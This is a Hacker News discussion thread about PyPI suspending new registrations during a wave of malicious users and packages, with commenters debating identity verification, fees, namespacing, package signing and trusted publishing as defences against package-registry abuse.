PyPI new user and new project registrations temporarily suspended

[+] throwaway892238|2 years ago|reply

Methods to deal with malicious actors in your system:

- Require toilsome identity verification. Things that are in short supply and are difficult to get and uniquely identify a person. Examples include a phone number, credit card, driver's license, mailed letter, etc.

- Require a referral, both for accounts and for new packages. Don't allow a signup unless the user has a referral code generated by another user with good karma. This isn't fool-proof, as a user that does get an account can then generate more accounts. But it makes it easier to revoke them en-masse, and forces users to be more scrupulous about who they refer, as you can block the referrer as well as the malicious user.

- Require community review, both of new users, and new packages. New users/packages are sent to a mailing list of moderators and somebody has to approve it, but someone who notices a problem can also reject it, even after it's been mistakenly approved. Slower, but there's more eyeballs to spot malicious stuff. This is more common among open source projects. (Growing your moderator list is important, as well as automating as much of the review process as possible; obviously PyPI currently has a shortage of moderators, but they should have a huge number of them by now!)

- Don't allow new users to do certain things until enough time has passed or they have accrued enough karma points. May require fixing bugs, answering questions, etc; work which benefits the community and most malicious actors wouldn't invest the time and effort in. Again not fool-proof, but definitely increases the time and difficulty for successful attacks.

- Captchas. These can obviously be worked around, but are a minimum-effort way to avoid bot signups.

For better defense-in-depth, combine multiple methods.

[+] reaperman|2 years ago|reply

> Captchas. These can obviously be worked around...

Best to not consider this a barrier at all. I helped build a lot of systems to bypass these and the "guarantees" they offer are truly "de minimus". Phone numbers and credit cards are are only slightly better.

The real answer is to determine how much value a successful compromise of your service can generate, and combine enough barriers to clearly exceed that value. Some criminals are very business-savvy, but many have poor judgement of value and will overspend on marginal cost-of-acquisition and try to "make up for it in volume", so it's important to be obviously not worth the expense.

Unfortunately for PyPI, there's a wide gamut of value gained from compromise from a wide variety of different actors. And for some of those actors, the potential value gained is existential, so they are willing to spend anything to compromise PyPI, and they have incredible resources. So then PyPI has to make itself more expensive than compromising Windows/SS7/Linux/iOS/Office365/AT&T/etc/etc. And that's a very difficult field to find yourself competing in.

Shameless plug: http://resolved.dominuslabs.com feel free to reach out for custom work - specializing in accessing gated sites for new search engines to do better web crawling, scraping public data, etc.

[+] pimlottc|2 years ago|reply

Of course, it should also be noted that these will create burdens for legitimate users as well, in some cases disproportionately (e.g. new developers will have a harder time getting referrals).

[+] woodruffw|2 years ago|reply

I posted a variant of this comment below, but for here as well: the single greatest challenge with any additional method here is operational burden. New methods for ensuring the authenticity of users cannot substantially increase the load on PyPI's maintainers without compromising the other activities that keep PyPI well-maintained (like developing and reviewing features, administrating the running instance itself, and addressing baseline operational overhead from locked-out users, etc.).

A pernicious thing about this problem is that even the methods that appear to devolve time away from the maintainers (like community review) quietly increase operational burden: they require effort to be allocated to support for those systems, require maintenance and administration of the "trusted list," etc.

[+] ryan29|2 years ago|reply

I think domain verified namespaces would make a difference. If I own example.com, it makes sense for my namespace to be @example.com (pypi.org/@example.com/project).

If all namespaces were domain based it would reduce impersonation and confusion while making it much easier to assess trustworthiness. If I can definitively associate a namespace across GitHub, PyPi, the internet, I can get a much better idea of whether or not I should trust someone.

I also think that could evolve into some type of attestations about money already being spent. I call it collateral attestation.

For example, if I use GitHub Sponsors to donate to a project, GitHub could attest to that. If I donate $50 to the PyPi project, they get an attestation that someone donated $50 to them and I get an attestation that I donated $50 to someone.

Even if it's only domain validated namespaces, at least that's something that costs a little bit of money every year and it scales without a lot of human intervention compared to most other ideas.

[+] bscphil|2 years ago|reply

> For better defense-in-depth, combine multiple methods.

It really starts to sound like we are reinventing Linux distributions. A strong vetting process and barriers to entry are why Linux distributions remain free of malware in their repositories. AFAIK no Linux distribution has ever been found distributing malware in an official repository (though I'd be interested if anyone knows of an exception).

[+] Hnrobert42|2 years ago|reply

These are good suggestions. I also like @BozeWolf’s suggestion below about charging for new accounts.

You could even do a combo. Like $25 sign up. Free with referral.

[+] strogonoff|2 years ago|reply

Identity verification is the only reliable option for popular public package registries that want to avoid becoming a cesspool of malware.

The problem with identity verification is that it can be expensive for you, the registry (reliable implementations require things up to video call verification in case of doubt), and risky for your users (who will have to trust your or your verification partner’s infosec practices with their PII).

Ideally either of those, but if you screw up—both.

It’s also crucial to remember that identity verification is never a guarantee: you cannot dispense with any pre-existing measures, like manual package review and user reports, to recoup the costs.

All in all, it is inevitably an expensive undertaking and a sad example of the tragedy of the commons.

[+] quickthrower2|2 years ago|reply

Or don’t have a system? What if you installed stuff via a git (not necessarily github) url/tag? Puts the onus on users to verify. Use checksums to avoid upstream changes you didn’t explicitly accept. No different than cloning a repo from a risk perspective (just as risky but no more so). This removes any implicit seal of approval. Companies like malwarebytes could monitor and maintain blacklists or whitelists. Sign up to multiple lists if paranoid.

[+] nonethewiser|2 years ago|reply

What about some testnet that allows people to push things up as a test? That seems like a valid need but a source of lots of garbage at the same time.

[+] nmstoker|2 years ago|reply

What about some method of "moderate to get upload credit"?

Obviously not full moderation (as you don't trust these people) but you could have them fed a few basic tasks that support moderation.

They would be give a selection of tasks, some of which overlap with tasks done by trusted people. If the user answers consistently with the trusted person, they get some credit. When a few such users show consensus on the non-overlapping tasks, those answers get accepted.

[+] matheusmoreira|2 years ago|reply

Linux distribution maintainers already do all of those things and probably more. It's always interesting to see other projects rediscover these lessons multiple times.

[+] BozeWolf|2 years ago|reply

I wonder if Apple’s trick would work for python packages. Pay a few (5? 10? 20?) bucks to become a Pypi developer/sponsor, it would also pay pypi’s operational bills. It raises the bar for malicious actors.

Additionally, if pypi provides keys to developers, pypi can also revoke certificates for developers making malicious packages.

It would need a system which checks package signatures on startup of a python app, or maybe there is some other way to do that. Pip —check or some thing which then runs in pipelines, specifically meant to check for malicious packages each day.

To decrease the barrier of entry on pypi, students could identify with their student number. Or pypi could work with a system where you have trusted users and packages and untrusted users. A bit like the blue checkmark, but without the negative connotation.

[+] viraptor|2 years ago|reply

That seems like a way to kill pypi as a popular service. For the 3 or so packages I have, I'd probably just change the description to pull from another location rather than pypi. It's not that I can't afford it, it's just that I don't want to end up paying for another subscription if rules change.

There are also people who wouldn't be able to pay for legal reasons. It would also stop teenagers who don't need the hassle of getting parents to pay.

[+] woodruffw|2 years ago|reply

FD: I’ve done some work on PyPI, but I am not an admin and everything below is an independent opinion/understanding.

PyPI’s operational costs are, to my understanding, mostly covered: hosting is graciously provided by a sponsor, and the PSF currently funds roles for its develop, administration, and security. More funding is always good and I believe the PyPI admins are looking to enable payments through the newly released “Organizations” feature[1].

Edit: and to make it more clear: payments for Organizations would be principally aimed at corporations and other groups.

> Additionally, if pypi provides keys to developers, pypi can also revoke certificates for developers making malicious packages.

There are currently plans in progress to allow PyPI users to upload Sigstore[2] signatures for packages.

That won’t directly address the spam issue, however — signatures will be opt-in (by necessity, due to the size of the packaging ecosystem), and no codesigning scheme can prevent a spammer from simply assuming a new identity (especially when new identities are “free,” as they normally are.)

Separately, revocation itself is a nasty problem for packaging ecosystems to deal with: ecosystems with trillions of dollars of value behind them (like the Web PKI) struggle with it, so it’s not immediately clear that it would be anything other than an additional operational burden.

Similarly for reputational systems: they’re difficult to operationalize without additional maintainer burden. That’s not to say that they’re necessarily bad or impractical for PyPI’s purposes; only that I’m not aware of a successful use of them in an open source packaging ecosystem. Compare, for example, PGP’s WoT failures.

[1]: https://blog.pypi.org/posts/2023-04-23-introducing-pypi-orga...

[2]: https://www.sigstore.dev/

[+] pmeira|2 years ago|reply

I maintain a few niche (electric power systems) packages, and I wouldn't mind a one-time or yearly fee, or a fee per project created. I say this as a Brazilian who lived in the middle of nowhere and managed to have a website in the 90's as a teen. If a monetary fee is not desirable, some other hurdle/challenge would probably work fine.

Recently I've seen someone on Reddit trying to automate the creation of PyPI projects through GitHub Actions. The person was complaining that the first deployment couldn't use an API key for that project since it didn't exist. So I'm not surprised some people are trying to do the same for malicious purposes.

The PyPI front page lists 455k projects. If you search for "test", you'll see there's a lot of throwaway projects (note that test.pypi.org is a thing). I'm mostly an EE researcher and I'm not sure students need a low barrier to entry to PyPI, since pip and other tools support installing from GitHub without too much hassle and there are also other non-PyPI package indices. Student packages/projects tend to be abandoned soon after graduation. An archived repo (with a license...), on GitHub or somewhere else, sounds more reasonable and also has more visibility that could end in code reuse someday (through the service's own search and search engines in general). I'd love to understand why so many people repeat this meme that student and teens need trivial access to production infra like PyPI.

So, I'd say being too inclusive, allowing fully unrestricted trivial creation of projects is kinda foolish. There needs to be some extra step, be it a fee, identity confirmation, manual moderation/approval, or something else. I'm sure the PyPA devs/maintainers have ideas.

[+] miohtama|2 years ago|reply

You can always have a trusted community member to waive the payment requirement, so anyone who demostrates genuine effort can have it for free.

[+] CameronNemo|2 years ago|reply

Universities could host gitlab instances with pypi registries built-in.

[+] NegativeK|2 years ago|reply

Start asking maintainers for SBOMs (this is rhetorical; please don't) and you'll find out how disinterested they are in doing even more work for others. They understand that there's a problem, but don't have the will to deal with extra work when they're already short on time.

Open source projects tend to be maintained by a tiny number of people who are scratching their own itch, not signing up for more barriers.

[+] CommitSyn|2 years ago|reply

As long as devs could be identified properly (ID selfie + ID closeup + small payment with card in same name) and students do the same with a smaller amount, I think that could work. Refund of protection deposit when you close your account. System of honor based on account age. The problem is it's incredibly hard to properly ID people. If fraudsters can get an ID+card they can make a convincing fake selfie ID photo from social media pictures. Plus accounts can just be stolen.

[+] crabbone|2 years ago|reply

Hahaha no. You physically cannot do it. Read PEP-508. Python can install packages from anywhere. Even if you start with PyPI, the dependency can be specified as hosted on a random unrelated resource.

And, on principle, I wouldn't pay PyPI anything. I want them gone, I don't want my money to feed a bunch of incompetent people who make my life miserable. So, if they were to implement this idea, I'd be hosting my packages on GitHub or Gitlab etc. and have dependencies link to those sources.

[+] efitz|2 years ago|reply

> The volume of malicious users and malicious projects being created on the index in the past week has outpaced our ability to respond to it in a timely fashion, especially with multiple PyPI administrators on leave.

People suck and that is why we cannot have nice things.

[+] miohtama|2 years ago|reply

It’s calle Tragedy of Commons

https://en.m.wikipedia.org/wiki/Tragedy_of_the_commons

One solution would be have a minimum payment or a trusted sponsor in order to register a new package. A minimum trust score through well-known community persons, or reduce spam by payments.

On the root cause why people suck is that different cultures and different people have different values. For many people making money by spamming is not an issue in their own internal value system. Thus, it is better to be tackled by making spam unprofitable.

[+] Hnrobert42|2 years ago|reply

The shame of it is that a tiny, tiny, tiny fraction of people really suck. The number of people involved is probably less than a thousand. (This is my totally uninformed speculation.)

[+] donio|2 years ago|reply

Yes, people suck and I wish they didn't but the other side of the problem is that the centralized flat-namespace model of PyPI is especially vulnerable.

[+] imran-iq|2 years ago|reply

It's only a matter of time until it happens to other systems too. Take rust for example where folks can install software via `cargo install <global name package>`. Top that off with fact that during compile (as an attacker) you have full access to your victims computer[0].

Python just happens to have more popularity for now.

I think golang gets this right where you need the full package name to have it be usable with get/build/install commands.

---

0: https://doc.rust-lang.org/cargo/reference/build-scripts.html

[+] woodruffw|2 years ago|reply

Namespacing isn't the problem here: an ecosystem with two (or more) levels of namespacing has the exact same username and package stuffing issues. Namespacing arguably makes typosquatting more difficult, but that has nothing to do with build-time code execution (a common feature of packaging systems) or other package confusion techniques.

Go is able to avoid these problems because it (arguably wisely) sidesteps nearly all package index problems by punting them to the source host.

[+] crabbone|2 years ago|reply

The answer was there all along since, at least Maven (but probably earlier). When specifying dependencies in Maven, you need to also provide checksums. Really hard to screw that accidentally.

But, the real problem is that any such system needs moderators. Verifying submissions is a tedious and difficult task with a lot of responsibility, if we are talking about something the size of PyPI. If they want to properly process the volume of submissions they have today, they need an army...

On the other hand, 99% of all stuff stored on PyPI is absolute junk. Yet on the other hand, people are used to there being dozens of versions of every package and packages declare dependencies very liberally.

All leads to the situation where there's a "frontier" of packages that can be installed together, but anything that lags 3-4+ versions behind the frontier is just taking space. Even if it's not malicious, it's not installable anymore because there's no more support for the platform it was written for.

But this is not the end of it. There are tons of simply broken packages, where some part of the archive is missing, or is malformed etc.

Proper moderation would have you submit your code, then review it, then publish it. Possibly, rejecting it in between if the code doesn't match requirements. Most people who publish their stuff to PyPI don't understand what needs to be in the package. Even packages like NumPy are full of useless junk.

But this will never happen, because the "community" grew used to the circus PyPI is. Python community doesn't care about the quality of the code, safety or anything other than a very shortsighted "make it work now" kind of goal.

There won't be a revision that purges junk or makes adding more junk harder. There will be another "quick fix", that will be obviously bad, but will kick the can down the road for a while longer.

[+] kccqzy|2 years ago|reply

A massive amount of people signing up with malicious intent (the Sybil attack) is a thing afflicting every single online service with a signup. I don't blame PyPI, but I think it's genuinely a hard problem to solve. Big Tech often combats this by running a bunch of heuristics and suspending accounts they detect to be bad, but of course we know how easy it is for even tiny false positives to blow up. I think we might come to the end of the era of free online accounts; only those accounts requiring a method of payment will continue to be viable.

[+] lolinder|2 years ago|reply

Modern package registries implicitly treat all package authors as equally trustworthy—you don't need to know which organization wrote the `zip` package, you just need to know that there's a package by that name and it opens your zip files. It's charmingly egalitarian and quite convenient, but the global namespace both enables typosquatting and trains developers to not think at all about the people who write the stuff in their supply chain. The biggest point of failure in any system—the humans—has no first-class expression in the typical modern package registry.

I can't help but wonder if this is something Maven got right. Namespacing packages according to domain names makes typosquatting vastly more difficult to pull off and makes authorship of dependencies a first-class concern for end users. If something is under org.apache, that means something about the contents of the package, and PyPI and company don't front that information nearly as well as Maven does.

[+] dlor|2 years ago|reply

I know folks hate the centralization of identity management to the big identity providers, but as AI gets better and better at defeating captcha it's going to get harder and harder for the small, independent ones to operate reliably and securely.

[+] adhesive_wombat|2 years ago|reply

"Never use your real name on that internet thing" will soon be a quaint throwback.

[+] reaperman|2 years ago|reply

I wrote a lot of the systems to break captchas. Currently the "small" (really medium), independent ones are doing way way way better than the big identity providers. Google reCAPTCHA was particularly easy for us to get past.

Shameless plug: http://resolved.dominuslabs.com feel free to reach out for custom work - specializing in accessing gated sites for new search engines to do better web crawling, scraping public data, building better API integrations on top of existing services, etc.

[+] vhcr|2 years ago|reply

Open Source captcha libraries are non-viable, you can train a NN on a few hours with a simple CNN architecture, there are some papers that describe how to do it.

[+] tzhenghao|2 years ago|reply

Tragedy of the commons - only need a few bad actors to ruin it all for us. Almost all distributors face this problem, from Docker Hub to PyPI. This also reminded me of official Postgres Docker image running a cryptominer in the background [1]

[1] - https://github.com/docker-library/postgres/issues/770

[+] badrabbit|2 years ago|reply

I think this is the wrong problem they are addressing. They should allow malicious users to be a possibility but what is lacking is package authentication/signing.

Sign all packages, new users get the worst grade, users with a lot of downloads over a long period get a slightly better grade then have different levels if trusted third party reviewed grades.

For new users' packages you get a big red warning that needs to be confirmed and bypassed in multiple ways with a message like "ERROR:THIS PACKAGE IS FROM AN ILL-REPUTED SOURCE, IT IS LIKELY MALICIOUS AND HASN'T UNDERGONE HUMAN REVIEW" kind of scream at you a little.

[+] omginternets|2 years ago|reply

I’ve seen multiple comments stating that namespacing solves (or at least mitigates) these kinds of attacks. Could someone kindly explain how? I’m sure it’s straightforward, but I don’t see it.

[+] woodruffw|2 years ago|reply

It doesn't, at least not directly. Namespaces make typosquatting more difficult, but it doesn't stop the main other incentives for spamming an index with inauthentic users and packages, i.e.:

1. Sneaking an inauthentic dependency into a tree somewhere;

2. Convincing less experienced users to install your package directly.

My understanding that (2), in particular, is an increasingly issue in cryptocurrency and other communities: inexperienced users typically talk on Discord and other chats, and may not fully understand that `pip install foo` essentially means "allow a random person to run code on my machine."

[+] bpicolo|2 years ago|reply

It's a lot easier to typo a package (e.g. requests -> request results in the wrong package) than it is to typo a namespace-package (@namespace/requests -> @namespace/request would result in an error).

Somewhat likewise, namespaces can build trust in a way that single packages can't

[+] elashri|2 years ago|reply

I like the simple solution that arXiv use (which allow anyone to publish a pre-print) also it has order of magnitude more code (compared to PyPI packages). If you want to be able to publish for the first time, you have to get a referral from a well established author on the platform.

And of course, things might be easier because you need to register using your real identify and that is excepted. This is different for PyPI that until now does not expect people to have their real identifies linked to their accounts.

[+] benatkin|2 years ago|reply

I hope they get a handle on this and don't do anything else to alienate data portability folks like making Microsoft the only "Trusted Publisher".

https://news.ycombinator.com/item?id=35646436

[+] ewdurbin|2 years ago|reply

there are no plans to limit trusted publishers. in fact there is another in the works: https://github.com/pypi/warehouse/issues/13551

[+] Severian|2 years ago|reply

I've been very cautious the last couple of years due to these bad actors when looking at packages that might suit my needs. If there is no online presence of the source code (git anything, zips/gzs, etc), multiple packages submitted in a short time frame, or a greater than normal amount, an/or a derivation/plugin of a popular package it's usually a no-go.

For those that I do possibly trust, I then download the package (pip download) and review it. Doing a quick regex for URLs or exec() calls helps, but I probably should use something like guarddog (https://github.com/DataDog/guarddog)

[+] NoboruWataya|2 years ago|reply

I know `pip search` has been disabled with PyPI for a while now due to a constant deluge of requests overwhelming the backend. Knowing that, and seeing this update, makes me think that PyPI is subject to an exceptional volume of malicious activity.

Does anyone know if it's true that PyPI receives more abuse than similar projects and, if so, why?

[+] zyl1n|2 years ago|reply

As someone who straddles both Python and Java world, I don't seem hear this kind of malicious packages problem with Maven (central) as I do with PyPI. What could be the difference? Perhaps Java world is full of old farts like me doing mundane thing with a handful of well established libraries.

[+] blibble|2 years ago|reply

namespacing? what's that

[+] adontz|2 years ago|reply

PyPI could integrate with Google/Microsoft/Apple as an authentication system (OAuth?).

Almost everyone has one of these IDs and it's hard enough to register new ones.

[+] woodruffw|2 years ago|reply

> PyPI could integrate with Google/Microsoft/Apple as an authentication system (OAuth?).

PyPI supports "trusted publishing,"[1] which provides a variant of this: it doesn't replace a user identity, but instead allows a platform (currently just GitHub, but support for others is on the way) to mint API tokens on a project's behalf.

Binding PyPI identities to well-known IdPs would address some of the problems here, but also introduces new ones: it creates a new kind of account lockout state (users who lose access to their IdP service, for whatever reason), introduces regulatory and data collection concerns, may prove excessively restrictive to users in countries with filtered Internet access, etc.

[1]: https://blog.pypi.org/posts/2023-04-20-introducing-trusted-p...

[+] vhcr|2 years ago|reply

All the spam I receive directly from gmail.com accounts kind of disproves your point.

[+] jjgreen|2 years ago|reply

That's what Rust does, you can only register with crates.io with a GitHub account.

131 comments